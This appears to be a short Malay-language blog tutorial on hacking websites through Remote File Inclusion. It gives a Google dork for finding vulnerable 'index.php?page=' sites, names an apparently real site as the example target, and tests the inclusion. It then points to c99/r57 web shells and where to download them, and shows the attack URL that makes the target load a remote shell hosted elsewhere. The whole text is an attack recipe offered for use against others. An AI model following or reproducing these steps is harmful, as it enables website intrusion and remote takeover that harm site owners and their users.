Langkah 1: Cari vulnerabile website
Biasanya, RFI vulnerabile site mempunyai format berikut:
www.Targetsite.com/index.php?page=Anything
Untuk mencarinya, boleh lah menggunakan “Google Dorks” berikut:
inurl:index.php?page=
Contoh:
www.cbspk.com/v2/index.php?page=disclaimer.htm
Langkah 2: Test website vulnerability
Tukarkan URL menjadi format seperti berikut:
www.targetsite.com/index.php?page=www.google.com
Contoh:
www.cbspk.com/v2/index.php?page= www.google.com
Langkah 3: Upload shell
Shell yang biasa digunakan ialah c99 ataupun r57.
Download shell:
http://www.localroot.net/
Hacker boleh upload shell di web hosting seperti ripway.com, 110mb.com dan sebagainya.
Contoh URL untuk shell:
http://h1.ripway.com/saurav1234/c99shell.php?
Langkah 4: Aktifkan shell
Tukarkan URL menjadi format berikut:
www.targetsite.com/index.php?page=http://webhosting.com/username/shell?
Contoh:
www.cbspk.com/v2/index.php?page= http://h1.ripway.com/saurav1234/c99shell.php?
0 comments:
Post a Comment